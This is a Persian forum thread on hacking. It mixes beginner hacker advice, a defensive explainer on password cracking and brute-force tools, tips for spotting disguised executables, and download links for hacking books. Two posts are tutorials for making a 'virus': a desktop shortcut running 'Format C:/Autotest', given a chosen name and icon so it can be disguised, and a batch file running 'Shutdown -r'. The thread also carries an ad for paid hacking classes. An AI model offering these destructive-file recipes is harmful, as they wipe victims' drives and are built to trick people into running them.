۳)استفاده از وب و نوشتن ((htmlرا یاد بگیرید.

برای خودتان یک Homepage درست کنید,برای با ارزش بودن homepageتان باید محتوا داشته باشد و برای هکرهای دیگر جذاب و آموزنده باشد.

۴)اگر زبان انگلیسی بلد نیستید آنرا یاد بگیرید.

متاسفانه مشکلی که اکثر ما ایرانیها با ان دست به گریبان هستیم بلد نبودن زبان انگلیسی هست برای پیشرفت در هر رشته ای خصوصا کامپیوتر و هک باید به زبان انگلیسی تسلط داشته باشید تا بتوانید خوب برنامه نوسی کنید و هم بتوانید منابع اصلی که به زبان لاتین میباشد را مطالعه کنید.

در پایان به پنج نکته اشاره میکنم که با انجام انها مورد احترام هکرها قرار میگیرید:

a)برنامه های باز متن بنویسید.

محترم ترین هکرها افرادی هستند که برنامه های بزرگی نوشته اند,برنامه ها پر قدرتی که احتیاجات گسترده ای را مرتفع میسازد و آن رادر دسترس همگان قرار داده اند.

b)به آزمایش و رفع اشکال برنامه های باز متن کمک کنید.

هکرها به کسانی که نرم افزارهای بازمتن را آزمایش و رفع اشکال میکنند یاری میرسانند,اگر مبتدی هستید یک نرم افزاردر حال برنامه نویسی پیدا کنید و یک آزمایشگر خوب باشید.

c)اطلاعات خوب را منتشر کنید.

کار خوب دیگری که میتوانید بکنید جمع آوری و دستچین مطالب جالب و مفید در برگه های وب و یا پرونده هایی مانند سوالات متداول و منتشر کردن آن است.

d)به پایداری شالوده کمک کنید.

بسیاری از کارهای کوچک ولی ضروری مانند مدیریت لیست های پستی و گروههای خبری و… وجود دارند که باید انجام شوند.

e)به خود فرهنگ هک کمک کنید.

مثلا با نوشتن مقاله ای در مورد اینکه چگونه هکر شویم.

یاد بگیریم که همه ی موفقیتها بر پایه یک شکست بنا شده اند و نقطه ی عطف موفقیت از لحظات بحران شروع میشود.

هرگاه به توانائی خود برای موفقیت شک کردید به موانعی فکر کنید که دیگران برا آن چیره شده اند.(ماتیوس)

e.einitabar
6th March 2011, 12:27 AM
عالی بود

uody
6th March 2011, 12:29 AM
متشکرم این تاپیکیه که خیلی بهش علاقه دارم و سعی دارم
این تاپیک فراموش نشه البته با کمک شما ودوستان[golrooz]

uody
6th March 2011, 07:06 AM
یک هکر چگونه رمز عبور شما را هک می کند؟
قبل از هر چیز باید گفت که این مطلب با هدف راهنمایی برای هک کردن سایر افراد نوشته نشده است. بلکه در اینجا سعی شده تا خوانندگان با نحوه صحیح انتخاب رمز عبور و پارامترهای مؤثر برای قدرتمند ساختن آن آشنا شوند. با خواندن آن تازه در می یابید که چطور ممکن است رمزهای عبور شما به راحتی هک بشوند و زندگی خودتان را از دست بدهید.

فکر می‌کنید اگر یک هکر قصد نفوذ به اکانت شما را داشته باشد، با چند بار سعی و خطا موفق خواهد شد؟ این لیست ده مورد از اولین احتمالات یک هکر برای کشف رمز عبورد شما است که البته پیدا کردن این اطلاعات هم بسیار ساده‌تر از آن چیزی است که تصور می کنید:

۱. اسم پدر، مادر، همسر، فرزند و یا حیوان خانگی شما اولین موردی است که امتحان می شود. البته همیشه عدد ۰ یا ۱ را هم بعد از آن باید امتحان کرد. زیرا بسیاری از سایت‌ها از شما می‌خواهند که از عدد هم در رمزعبورتان استفاده کنید.
۲. چهار رقم آخر شماره موبایل و یا کد ملی تان
۳. ۱۲۳ یا ۱۲۳۴ و یا ۱۲۳۴۵۶
۴. کلمه password
۵. شهر محل اقامت یا دانشگاهی که در آن تحصیل می‌کنید و یا اسم تیم فوتبال محبوب تان
۶. روز تولد خود، والدین و یا فرزندان تان
۷. کلمه god
۸. هدف بزرگ شما در زندگی
۹.کلمه money
۱۰. کلمه love

هکرها به دور از هر گونه اصول اخلاقی برای بدست آوردن اطلاعات مورد نظرشان از هر ابزاری استفاده می‌کنند. تنها مرز و سد نگه دارنده بین فاش شدن و محرمانه ماندن اطلاعات تان رمزعبوری است که انتخاب می‌کنید و به شما بستگی دارد که این حصار را تا چه اندازه قدرتمند بسازید.

یکی از ساده‌ترین راه‌های نفوذ، استفاده از روشی به نام Brute Force attack است. در این روش هکر با استفاده از نرم افزارهایی که در دسترس همه قرار دارند و شما هم می‌توانید با مراجعه به وب سایت insecure.org یک لیست ده تایی از نمونه‌های رایگان آن را ببینید به اکانت شما نفوذ می‌کند.

چطور ممکن است که کسی بتواند اکانت من را هک کند و به رمزعبورم دست پیدا کند؟ شیوه کار من به عنوان یک هکر می‌تواند این باشد:
⁃ احتمالاً از یک رمزعبور مشترک برای اکانت های زیادی استفاده می کنید! این‌طور نیست؟
⁃ برخی از وب سایت‌ها مانند سایت بانکی تان و یا VPN اتصال به اداره تان معمولاً از امنیت قابل قبولی برخوردارند. پس هکر خبره ای مانند من اصلاً وقت خود را برای آن تلف نمی کند.
⁃ به هر حال وب سایت‌های دیگری مانند فروم ها، سایت‌های ارسال کارت تبریک و سیستم‌های خرید آنلاین وجود دارند، که شما همیشه به آن‌ها مراجعه می‌کنید و خوشبختانه آن‌ها از امنیت پایین‌تری برخوردارند، بنابراین من آن‌ها را برای شروع انتخاب می کنم.
⁃ الان وقت آن است که برنامه‌هایی از قبیل Brutus یا Wwwhack و باThc Hydra را از بند آزاد کنم. این برنامه‌ها در مدت زمان بسیار کوتاهی ۱۰ تا ۱۰۰ هزار نام کاربری و رمز عبور مختلف را با استفاده از دستور عملی که من در اختیار شان قرار داده‌ام، می سازند.
⁃ چیزی که من تا اینجا به دست آورده‌ام تعداد زیادی نام کاربری و رمزعبور طبق الگوی ۱۰گانه بالا است که می‌توانم بر روی سایت‌های هدف امتحان کنم.
⁃ دست نگه دارید .... من از کجا بدانم که حساب شما در کدام بانک است و نام کاربری تان چیست؟ یا اینکه سایت‌هایی را که مرتبا با رمزعبور بازدید می کنید، چه هستند؟ تمام این وب سایت‌ها، کوکی هایی را بر روی حافظه مرورگر تان بر جای می‌گذارند که رمز نگاری نیستند و اطلاعات لازم را در اختیار من قرار می دهند. فقط لازم است به این شیرینی‌های (کوکی) خوشمزه دست پیدا کنم!

سؤال مهمی که در اینجا مطرح می‌شود این است که طی این پروسه چقدر زمان لازم دارد؟

زمان انجام این کار به سه عامل مهم بستگی دارد: اول به طول رمزعبور و ترکیبی بودن آن، دوم سرعت کامپیوتر هکر و در آخر سرعت خط اینترنت هکر.

جدول زیر زمان های تخمین زده شده برای این کار را بر اساس نحوه انتخاب رمزعبور نشان می دهد. در این تخمین ها سایر امکانات یکسان هستند. به تفاوت زمان کشف یک پسورد هشت کاراکتری که فقط با حروف کوچک به وجود آمده با پسورد دیگری با همان تعداد کارکتر ولی استفاده از حروف کوچک و بزرگ و نشانه‌ها دقت کنید. تغییر یکی از حروف به حرف بزرگ و استفاده از علامت ستاره زمان را از ۴/۲ روز به‌ ۱/۲ قرن افزایش می دهد!


http://negahbaan.com/sites/default/files/blue/password_hacking_times-negahbaan-com.jpg

البته زمان های فوق بر اساس کارکرد کامپیوترهای معمولی محاسبه شده است و اگر به عنوان مثال از کامپیوترهای گوگل برای این کار استفاده شود، کشف رمز هزار برابر سریعتر انجام خواهند شد.

تا همین جا هم کاملاً واضح است که اولین اقدام مهم شما برای حفظ امنیت تان، استفاده از رمزعبور مناسب و خودداری از انتخاب رمزهای عبور ضعیف است.

نگهداری رمزهای عبور طولانی و متعدد در ذهن، آزار‌دهنده و گاهی اوقات غیر ممکن است، اما برای هر مشکل راه حلی وجود دارد...

در اینجا به ارائه چند راه حل خوب می پردازیم:
⁃ اگر از الفبای انگلیسی استفاده می‌کنید، از اعداد به جای حروفی هم قیافه شان استفاده کنید. به عنوان مثال از عدد '0' به جای حرف 'o' ، از 3 به جای E و از @ در کلماتی که a دارند استفاده کنید.
⁃ به صورت تصادفی از حروف بزرگ استفاده کنید. (مانند Mod3lTF0rd)
⁃ در جوانی به چه چیزی علاقه داشته اید؟ دقت کنید از اسم شخص استفاده نکنید زیرا اسامی و کلماتی که در دیکشنری دارای مفهوم هستند به سرعت در حملات Brute Force attack لو می روند.
⁃ اسم مکانی که آن را دوست داشتید یا یک روز تعطیل جذاب و شاید رستوران مورد علاقه تان می‌توانند رمزعبور خوبی باشند، البته به استفاده از بند اول و دوم در اینجا هم توجه داشته باشید.
⁃ یک کلمه فارسی با مفهوم در شرایطی که زبان کامپیوتر شما انگلیسی است، یک رمز عبور مطمئن خواهد بود! اما باز تأکید می‌کنم که حروف بزرگ تصادفی را فراموش نکنید.
⁃ اگر به خاطر سپردن رمزهای عبور برایتان سخت است، برنامه LastPass را به شما توصیه می کنیم. این نرم‌افزار امکان نگهداری اطلاعات اکانت های مختلف شما را به صورت رمز نگاری شده برایتان فراهم می‌کند. با استفاده از LastPass تنها حفظ یک رمز عبور اصلی ضرورت دارد و خود نرم‌افزار فرم‌های نام کاربری و رمز عبور را به صورت خودکار، پس از دریافت رمز اصلی، پر می کند. نمونه‌های دیگری مانند keepass و Roboform نیز وجود دارند که همین کار را برای شما انجام می دهند.
با LastPass فرماندهی رمزهای عبور خود را در دست بگیرید

-در نهایت پس از انتخاب رمز عبور، با استفاده از سرویس هایی مانند Password Strengh Test مایکروسافت میزان امن بودن آن را آزمایش کنید.
چگونه یک رمزعبور مطمئن بسازیم و از آن نگهداری کنیم - بخش اول

نکته دیگری که بایستی به آن توجه داشته باشید، این است که همه اکانت های خود را در زمان انتخاب رمزعبور، مهم بدانید. برای مثال برخی از افراد با این توجیه که ایمیل حساسی دریافت نمی‌کنند، نسبت به امنیت اکانت ایمیل خود بی توجه هستند. غافل از اینکه هکر می‌تواند با در اختیار داشتن ایمیل شما، حتی با بانک شما مکاتبه کند و درخواست دریافت رمز عبور جدید بنماید. به همین سادگی آقای هکر محترم به مهمترین اطلاعات شما دسترسی پیدا می کند.

گاهی اوقات افراد اطلاعات مهم را روی کامپیوتر خانگی شان، دور از دسترس سایرین در شرایطی که با یک router و یک Firewall محافظت می‌شوند. نگهداری می‌کنند. غافل از اینکه فراموش کرده‌اند رمز عبور پیش‌فرض سخت‌افزار خود را تغییر دهند. بنابراین هکر به سادگی به شبکه خانگی شما متصل شده و اطلاعات را سرقت می کند.

معمولاً انسان‌ها تا زمانی که با نتیجه دردناک یک اشتباه روبرو نشوند، نکات لازم را رعایت نمی‌کنند. ولی آیا واقعاً انتخاب یک رمز عبور درست و قدرتمند برای جلوگیری از اتفاقات دردناک و حفظ حریم خصوصی کار دشواری است؟

uody
10th March 2011, 11:53 PM
دانلود کتاب راههای در امان ماندن از هکرها در هنگام چت


http://dl.parsbook.org/server1/archive/1145161250.JPG

نام کتاب : راههای در امان ماندن از هکرها در هنگام چت

نویسنده : ارباب مجازی

ناشر : پارس بوک

زبان کتاب : فارسی

تعداد صفحه : 27

قالب کتاب : PDF

حجم فایل : 3,190 Kb



http://dl.parsbook.org/server3/uploads/Rahaye-dar-aman-mandan-az-hackerha.zip
توضیحات : شما در این کتاب چند راه درامان از هکرها در هنگام چت و با حداقل حملاتی که متوجه شما است آشنا می شوید. این کتاب طوری تنظیم شده است که هم افراد مبتدی و متوسط و پیشرفته در چت از آن استفاده کنند. در ضمن مسنجر شما مهم نیست یعنی چه یاهو و یا گوگل و هر چیز دیگه باشه چون این نکات به صورت کلی ارائه شده است.

uody
16th March 2011, 12:52 AM
چگونه فايلهاي هك را شناسايي کنيم؟

هنگام چت (CHAT) در ياهو و يا سرويس هاي ديگر مسنجر ممکن است از افراد مختلف فايلي را دريافت کنيد که گاهي اوقات اين فايلها براي نفوذ به کامپيوتر شما ويا دزديدن پسوورد شما مي باشند. در اين زمينه روشي وجود دراد که با استفاده از آن هنگام دريافت فايل، تا حد زيادي از امنيت آن اطمينان حاصل فرمائيد:

- وقتي شخصي فايلي را براي شما ارسال مي کند، در پيغامي که براي شما مبني بر تاييد آن مي آيد، نام شخص فرستنده، نام فايل، حجم آن و همچنين فرمت و از اين قبيل اطلاعات در آن قيد شده است. شما بايد توجه داشته باشيد که آيا فايلي که براي شما ارسال شده است ، از لحاظ نوع و فرمت، همان فايلي است که قرار بوده ارسال شود، يا خير؟

در حقيقت مثلا اگر ميخواهيد عکسي را دريافت نماييد، بايد فايل مربوطه پسوند JPG يا يکي از پسوند هاي فايلهاي گرافيک را داشته باشد، ( نه اينکه فايلي با پسوند Exe و يا Bat يا Com براي شما ارسال شود و فرستنده هم مدعي باشد که اين يک فايل تصويري است). در واقع فايلهايي که با نرم افزارها Magic-ps ساخته شده اند، داراي پسوند هايي نظير SCR يا Exe و ... و يا مثل (mypic.jpg.exe) مي باشند، که نشان دهنده آن است که فايل فرستاده شده، يکي از انواع فايل هاي ساخته شده توسط برنامه Magic-ps يا برنامه هاي مشابه است، که براي به دست آوردن پسوورد شما مي باشد. بنا براين همواره نوع پسوند فايلهاي دريافتي را زير نظر داشته باشيد و بدانيد که از اين طريق و قبل از هر جيز ميتوانيد تا حد زيادي از کيفيت، نوع و چگونگي عملکرد و ماهيت يک فايل اطلاع حاصل کنيد.

براي اطمينان و امنيت بيشتر حتما يک نرم افزار ضد ويروس معروف و به روز شده بر روي کامپيوتر خود داشته باشيد و همواره فايلهاي دريافتي از اينترنت را اسکن نماييد تا امنيت و اطمينان شما درصد بالاتري داشته باشد و درصد تخريب اطلاعات کامپيوتر توسط ويروس ها بسيار کم شود.

uody
19th March 2011, 03:52 PM
کتاب تصویری آموزش ساده و کامل هک شبکه و راه های نفوذ

File name
hack_book_network.rar

File size : 517 KB
http://parsaspace.com/files/1658008884/hack_book_network.rar.html
رمز فایل : دنیای هک 3000
منبع:vatandownload.com

uody
31st March 2011, 02:26 AM
این ویروس چیز سختی نیست ولی خیلی خطرناكه.

اول از همه روی دسكتاپ رایت كلیك كنید بعدش New ShortCut بسازید.

یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

سپس Next را زده و در صفحه جدید كه باز میشه یه اسم واسه ویروستون انتخاب كنید.

سپس Next را زده ویه آیكون با سلیقه خودتون برای اون انتخاب كرده و Finish كنید.

خب دیگه كارمون تمومه حالا اگه اجراش كنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format C:/autotest بنویسید

Format a:/autotest و یه فلاپی كه حاوی اطلاعات هستش در Flopy Drive خود

قرار دهید بعد اجراش كنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی

پاك شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش كرد.

منبع:forum.vatandownload.com

uody
31st March 2011, 02:28 AM
آموزش ساختن یه ویروس

این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان 30 ثانیه كامپیوتر شما رو خاموش میكنه.

برای ساختن این ویروس ابتدا روی صفحه دسكتاب راست كلیك كنید.

سپس new و بعد از اون text document رو انتخاب كنید.

سپس وارد این فایل متنی شده و این عبارت رو تایپ كنید.

Shutdown –r

حالا از منوی فایل save as رو انتخاب كنید.

در قسمت file name اسم فایل رو مشخص كنید.

توجه كنید كه این اسم حتما با پسوند bat باشه.مثل rockboys.bat

در قسمت encoding شما باید ANSI رو انتخاب كنید.

حالا save كنید.

شما میتونید این فایل رو روی خودتون اجرا كنید و نتیجه كار رو ببینید.

برای اینكه از خاموش شدن كامپیوترتون جلوگیری كنید كافیه در قسمت run عبارت زیر رو تایپ كنید.

Shutdown –a

0014
23rd April 2011, 02:23 PM
ممنون پستت بسیار عالی و کامل بود
امیدوارم که همیشه پیروز و سربلند باشی[tashvigh][tashvigh][tashvigh]
[golrooz][golrooz][golrooz]

مسعود00
26th August 2011, 04:52 PM
دستت درد نکنه[cheshmak]

behnam_zz69
6th October 2012, 05:14 PM
mrcazizam[golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz][golrooz]mrc mamnuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuun

lazat
20th October 2012, 10:35 AM
اول اینکه تمام آموزش هاتون کپی برداری از مطالب خودمه بی اجازه من تو سایتتون درج شده این مطالبو دقیق ازپایان نامه فوق لیسانسم کپی برداری شده بعد به صورت فایل pdfتبدیلش کردم خداییییش ناراحت شدم بعد کلایس آموزش هک به صورت حرفه ای گذاشتم هر کسی خواست pm بدهalenca.cinti@yahoo.comsسایت خوبی داریین فقط باگ داره چکش کنین با تشکر

lazat
20th October 2012, 10:41 AM
راستی یادم رفت به دست آوردن ipدر چت دیگه کارایی نداره چون کلا دارن ipرومخفی میکنن با استفاده از برنامه hide ip

استفاده از تمامی مطالب سایت تنها با ذکر منبع آن به نام سایت علمی نخبگان جوان و ذکر آدرس سایت مجاز است

استفاده از نام و برند نخبگان جوان به هر نحو توسط سایر سایت ها ممنوع بوده و پیگرد قانونی دارد